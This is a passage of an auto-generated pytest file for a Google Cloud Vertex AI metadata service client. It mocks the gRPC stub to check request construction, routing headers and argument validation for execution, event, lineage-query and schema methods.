# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_execution.Execution(
name="name_value",
display_name="display_name_value",
state=gca_execution.Execution.State.NEW,
etag="etag_value",
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
)
response = await client.update_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.UpdateExecutionRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_execution.Execution)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.state == gca_execution.Execution.State.NEW
assert response.etag == "etag_value"
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_update_execution_async_from_dict():
await test_update_execution_async(request_type=dict)
def test_update_execution_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.UpdateExecutionRequest()
request.execution.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_execution), "__call__") as call:
call.return_value = gca_execution.Execution()
client.update_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"execution.name=name_value",
) in kw["metadata"]
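# Nested URI fields such as ``execution.name`` are encoded into the routing
# header with a dotted ``field.path=value`` key, as asserted above.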
@pytest.mark.asyncio
async def test_update_execution_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.UpdateExecutionRequest()
request.execution.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_execution), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_execution.Execution()
)
await client.update_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"execution.name=name_value",
) in kw["metadata"]
def test_update_execution_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_execution.Execution()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.update_execution(
execution=gca_execution.Execution(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].execution
mock_val = gca_execution.Execution(name="name_value")
assert arg == mock_val
arg = args[0].update_mask
mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
assert arg == mock_val
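# ``update_mask`` is a ``google.protobuf.FieldMask``; only the paths listed
# in it are modified by the server ("paths_value" above is a placeholder).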
def test_update_execution_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_execution(
metadata_service.UpdateExecutionRequest(),
execution=gca_execution.Execution(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
@pytest.mark.asyncio
async def test_update_execution_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_execution), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            gca_execution.Execution()
        )
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.update_execution(
execution=gca_execution.Execution(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].execution
mock_val = gca_execution.Execution(name="name_value")
assert arg == mock_val
arg = args[0].update_mask
mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
assert arg == mock_val
@pytest.mark.asyncio
async def test_update_execution_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.update_execution(
metadata_service.UpdateExecutionRequest(),
execution=gca_execution.Execution(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.DeleteExecutionRequest,
dict,
],
)
def test_delete_execution(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/spam")
response = client.delete_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteExecutionRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
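# ``delete_execution`` is a long-running operation: the stub returns an
# ``operations_pb2.Operation`` and the client wraps it in an operation
# future, hence the ``future.Future`` check above.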
def test_delete_execution_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_execution), "__call__") as call:
client.delete_execution()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteExecutionRequest()
@pytest.mark.asyncio
async def test_delete_execution_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.DeleteExecutionRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
response = await client.delete_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteExecutionRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_delete_execution_async_from_dict():
await test_delete_execution_async(request_type=dict)
def test_delete_execution_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.DeleteExecutionRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_execution), "__call__") as call:
call.return_value = operations_pb2.Operation(name="operations/op")
client.delete_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_execution_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.DeleteExecutionRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_execution), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/op")
)
await client.delete_execution(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
def test_delete_execution_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_execution(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_delete_execution_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_execution(
metadata_service.DeleteExecutionRequest(),
name="name_value",
)
@pytest.mark.asyncio
async def test_delete_execution_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_execution), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_execution(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_delete_execution_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_execution(
metadata_service.DeleteExecutionRequest(),
name="name_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.PurgeExecutionsRequest,
dict,
],
)
def test_purge_executions(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_executions), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/spam")
response = client.purge_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.PurgeExecutionsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_purge_executions_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_executions), "__call__") as call:
client.purge_executions()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.PurgeExecutionsRequest()
@pytest.mark.asyncio
async def test_purge_executions_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.PurgeExecutionsRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_executions), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
response = await client.purge_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.PurgeExecutionsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_purge_executions_async_from_dict():
await test_purge_executions_async(request_type=dict)
def test_purge_executions_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.PurgeExecutionsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_executions), "__call__") as call:
call.return_value = operations_pb2.Operation(name="operations/op")
client.purge_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_purge_executions_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.PurgeExecutionsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_executions), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/op")
)
await client.purge_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_purge_executions_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_executions), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.purge_executions(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
def test_purge_executions_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.purge_executions(
metadata_service.PurgeExecutionsRequest(),
parent="parent_value",
)
@pytest.mark.asyncio
async def test_purge_executions_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_executions), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.purge_executions(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_purge_executions_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.purge_executions(
metadata_service.PurgeExecutionsRequest(),
parent="parent_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.AddExecutionEventsRequest,
dict,
],
)
def test_add_execution_events(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_execution_events), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.AddExecutionEventsResponse()
response = client.add_execution_events(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.AddExecutionEventsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, metadata_service.AddExecutionEventsResponse)
def test_add_execution_events_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_execution_events), "__call__"
) as call:
client.add_execution_events()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.AddExecutionEventsRequest()
@pytest.mark.asyncio
async def test_add_execution_events_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.AddExecutionEventsRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_execution_events), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.AddExecutionEventsResponse()
)
response = await client.add_execution_events(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.AddExecutionEventsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, metadata_service.AddExecutionEventsResponse)
@pytest.mark.asyncio
async def test_add_execution_events_async_from_dict():
await test_add_execution_events_async(request_type=dict)
def test_add_execution_events_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.AddExecutionEventsRequest()
request.execution = "execution_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_execution_events), "__call__"
) as call:
call.return_value = metadata_service.AddExecutionEventsResponse()
client.add_execution_events(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"execution=execution_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_add_execution_events_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.AddExecutionEventsRequest()
request.execution = "execution_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_execution_events), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.AddExecutionEventsResponse()
)
await client.add_execution_events(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"execution=execution_value",
) in kw["metadata"]
def test_add_execution_events_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_execution_events), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.AddExecutionEventsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.add_execution_events(
execution="execution_value",
events=[event.Event(artifact="artifact_value")],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].execution
mock_val = "execution_value"
assert arg == mock_val
arg = args[0].events
mock_val = [event.Event(artifact="artifact_value")]
assert arg == mock_val
def test_add_execution_events_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.add_execution_events(
metadata_service.AddExecutionEventsRequest(),
execution="execution_value",
events=[event.Event(artifact="artifact_value")],
)
@pytest.mark.asyncio
async def test_add_execution_events_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_execution_events), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.AddExecutionEventsResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.add_execution_events(
execution="execution_value",
events=[event.Event(artifact="artifact_value")],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].execution
mock_val = "execution_value"
assert arg == mock_val
arg = args[0].events
mock_val = [event.Event(artifact="artifact_value")]
assert arg == mock_val
@pytest.mark.asyncio
async def test_add_execution_events_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.add_execution_events(
metadata_service.AddExecutionEventsRequest(),
execution="execution_value",
events=[event.Event(artifact="artifact_value")],
)
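
# The flattened/flattened-error tests above all exercise the same GAPIC
# contract: a method accepts either a prebuilt request object or flattened
# keyword fields, never both. A minimal sketch of that guard (a hypothetical
# helper, not the generated implementation), assuming None marks an unset
# flattened field:
def _reject_mixed_call_styles(request, **flattened_fields):
    # Mirror the ValueError the generated clients raise when both call
    # styles are supplied at once.
    if request is not None and any(
        value is not None for value in flattened_fields.values()
    ):
        raise ValueError(
            "If the `request` argument is set, then none of "
            "the individual field arguments should be set."
        )
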
@pytest.mark.parametrize(
"request_type",
[
metadata_service.QueryExecutionInputsAndOutputsRequest,
dict,
],
)
def test_query_execution_inputs_and_outputs(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_execution_inputs_and_outputs), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = lineage_subgraph.LineageSubgraph()
response = client.query_execution_inputs_and_outputs(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.QueryExecutionInputsAndOutputsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, lineage_subgraph.LineageSubgraph)
def test_query_execution_inputs_and_outputs_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_execution_inputs_and_outputs), "__call__"
) as call:
client.query_execution_inputs_and_outputs()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.QueryExecutionInputsAndOutputsRequest()
@pytest.mark.asyncio
async def test_query_execution_inputs_and_outputs_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.QueryExecutionInputsAndOutputsRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_execution_inputs_and_outputs), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
lineage_subgraph.LineageSubgraph()
)
response = await client.query_execution_inputs_and_outputs(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.QueryExecutionInputsAndOutputsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, lineage_subgraph.LineageSubgraph)
@pytest.mark.asyncio
async def test_query_execution_inputs_and_outputs_async_from_dict():
await test_query_execution_inputs_and_outputs_async(request_type=dict)
def test_query_execution_inputs_and_outputs_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.QueryExecutionInputsAndOutputsRequest()
request.execution = "execution_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_execution_inputs_and_outputs), "__call__"
) as call:
call.return_value = lineage_subgraph.LineageSubgraph()
client.query_execution_inputs_and_outputs(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"execution=execution_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_query_execution_inputs_and_outputs_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.QueryExecutionInputsAndOutputsRequest()
request.execution = "execution_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_execution_inputs_and_outputs), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
lineage_subgraph.LineageSubgraph()
)
await client.query_execution_inputs_and_outputs(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"execution=execution_value",
) in kw["metadata"]
def test_query_execution_inputs_and_outputs_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_execution_inputs_and_outputs), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = lineage_subgraph.LineageSubgraph()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.query_execution_inputs_and_outputs(
execution="execution_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].execution
mock_val = "execution_value"
assert arg == mock_val
def test_query_execution_inputs_and_outputs_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.query_execution_inputs_and_outputs(
metadata_service.QueryExecutionInputsAndOutputsRequest(),
execution="execution_value",
)
@pytest.mark.asyncio
async def test_query_execution_inputs_and_outputs_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_execution_inputs_and_outputs), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
lineage_subgraph.LineageSubgraph()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.query_execution_inputs_and_outputs(
execution="execution_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].execution
mock_val = "execution_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_query_execution_inputs_and_outputs_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.query_execution_inputs_and_outputs(
metadata_service.QueryExecutionInputsAndOutputsRequest(),
execution="execution_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.CreateMetadataSchemaRequest,
dict,
],
)
def test_create_metadata_schema(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_schema), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = gca_metadata_schema.MetadataSchema(
name="name_value",
schema_version="schema_version_value",
schema="schema_value",
schema_type=gca_metadata_schema.MetadataSchema.MetadataSchemaType.ARTIFACT_TYPE,
description="description_value",
)
response = client.create_metadata_schema(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.CreateMetadataSchemaRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_metadata_schema.MetadataSchema)
assert response.name == "name_value"
